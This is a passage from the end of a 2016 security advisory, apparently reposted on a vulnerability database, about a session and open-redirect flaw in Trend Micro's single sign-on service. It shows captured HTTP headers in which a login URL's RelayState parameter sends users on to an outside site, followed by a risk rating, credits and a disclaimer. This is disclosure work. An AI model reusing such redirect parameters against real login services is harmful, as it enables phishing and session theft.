path=/; httponly]  
Location[https://yahoo.com/my_account/]  
Pragma[no-cache]  
Cache-Control[no-cache, must-revalidate]  
Vary[Accept-Encoding]  
Content-Encoding[gzip]  
X-Frame-Options[SAMEORIGIN]  
Content-Length[368]  
Connection[close]  
Content-Type[text/html; charset=UTF-8]  
  
  
  
GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI   
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime  
Type[text/html]  
Request Headers:  
Host[yahoo.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
  
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]  
Cookie[B=]  
Connection[keep-alive]  
Response Headers:  
Date[Fri, 29 Jan 2016 11:52:31 GMT]  
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]  
Server[ATS]  
Location[https://www.yahoo.com/my_account/]  
Content-Type[text/html]  
Content-Language[en]  
Cache-Control[no-store, no-cache]  
  
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]  
Content-Length[382]  
X-Firefox-Spdy[h2]  
  
  
Security Risk:  
==============  
The security risk of the session web and redirect vulnerability in the  
trend micro sso online service web-application is estimated as high.  
(CVSS 6.5)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution  
Security GmbH]  
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties, either expressed  
or implied, including the warranties of merchantability and capability  
for a particular purpose. Vulnerability-Lab or its suppliers are not liable  
in any case of damage, including direct, indirect, incidental,  
consequential loss of business profits or special damages, even if  
Vulnerability-Lab  
or its suppliers have been advised of the possibility of such damages.  
Some states do not allow the exclusion or limitation of liability for  
consequential or incidental damages so the foregoing limitation may not  
apply. We do not approve or encourage anybody to break any vendor licenses,  
policies, deface websites, hack into databases or trade with  
fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com   
- www.evolution-sec.com  
Contact: [email protected] -  
[email protected] - [email protected]  
Section: magazine.vulnerability-db.com -  
vulnerability-lab.com/contact.php -  
evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab -  
facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory. Permission to  
electronically redistribute this alert in its unmodified form is  
granted. All other rights, including the use of other media, are  
reserved by  
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website  
is trademark of vulnerability-lab team & the specific authors or  
managers. To record, list (feed), modify, use or edit our material contact  
([email protected] or [email protected]) to get a  
permission.  
  
Copyright © 2016 | Vulnerability Laboratory - [Evolution  
Security GmbH]™  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
CONTACT: [email protected]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Mar 2016 00:00Current
trend microsso redirectsession theftvulnerabilityaccount systemweb-application2016 q1
62